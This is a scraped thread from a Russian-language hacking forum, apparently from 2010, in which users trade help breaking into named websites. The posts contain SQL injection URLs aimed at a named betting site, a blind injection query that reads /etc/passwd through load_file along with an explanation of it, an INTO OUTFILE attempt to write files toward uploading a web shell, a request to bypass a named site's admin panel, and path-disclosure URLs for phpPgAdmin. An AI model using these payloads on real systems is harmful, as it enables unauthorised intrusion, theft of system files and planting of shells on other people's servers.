ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.07.2010, 20:13
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Попробуй tatable_nameble_name
|
|
|
04.07.2010, 22:05
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Возможно ли здесь обойти фильтрацию select?
Код:
Code:
http://www.bestbets.org/bets/bet.php?id=-27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+--+
|
|
|
|
04.07.2010, 22:26
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Помогите разобраться с этим постом
/showpost.php?p=1304326&postcount=93
Не могу понять одного ...
Код:
Code:
id=1+and+1=if(load_file('/etc/passwd')+is+not+NULL,1,2)--+
Что значит +is+not+NULL,1,2 и зависит ли такой запрос от кол-во колонок ?
И где можно почитать про под запросы? |
|
|
|
04.07.2010, 22:59
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137
Репутация:
66
|
|
Сообщение от SeNaP
SeNaP said:
Помогите разобраться с этим постом
/showpost.php?p=1304326&postcount=93
Не могу понять одного ...
Код:
Code:
id=1+and+1=if(load_file('/etc/passwd')+is+not+NULL,1,2)--+
Что значит +is+not+NULL,1,2 и зависит ли такой запрос от кол-во колонок ?
И где можно почитать про под запросы? Если привелегия file_priv есть, то тогда
Код:
Code:
if(load_file('/etc/passwd')+is+not+NULL,1,2)
превратится в 1 и финальный запрос будет выглядить как
...
Код:
Code:
id=1+and+1=1--+
то есть условие будет верно. В противном случае будет 2 и условие не сработает, то есть
Код:
Code:
id=1+and+1=2--+
|
|
|
|
04.07.2010, 23:51
|
|
Новичок
Регистрация: 03.06.2009
Сообщений: 10
Провел на форуме:
178004
Репутация:
0
|
|
Подскажите как можно залить шелл через такой инклуд?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
|
|
|
|
05.07.2010, 00:01
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Алкорайдер, где ты там инкуд увидел?
UPD:
Вроде справился с двойным запросом при заливки шелла, файл создается, но вот только почему то с содержанием 1 или 0
Если select 'test' то пишется в файл 0
Если select 123 то пишется в файл 1
сам запрос выглядит так
select COUNT(CODE) as count1 from tbl_base where ISMODER=1 and (SUBKAT1=".$rs['CODE']." or SUBKAT2=".$rs['CODE']." or SUBKAT3=".$rs['CODE']
Делаю так
53 and if((select 123 into outfile '/tmp/test7.txt'),53,54)=53
|
|
|
|
05.07.2010, 00:02
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Можно только произвольные файлы читать, не более.
|
|
|
|
05.07.2010, 00:26
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
как обойти эту хрень?
http://www.salesbearing.com/admin/
|
|
|
|
05.07.2010, 00:35
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Подскажите, какие уязвимости есть в phpPgAdmin 4.2.2 (PHP 4.4.9).
Можно ли как нибудь авторизироватся? И вообще можно ли залить шелл через нее?
|
|
|
|
05.07.2010, 03:16
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
раскрытие путей:
http://site.com/phpPgAdmin/sqledit.php?server[]=%3A5432%3Aallow&action=sql
http://site.com/phpPgAdmin/libraries/lib.inc.php
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
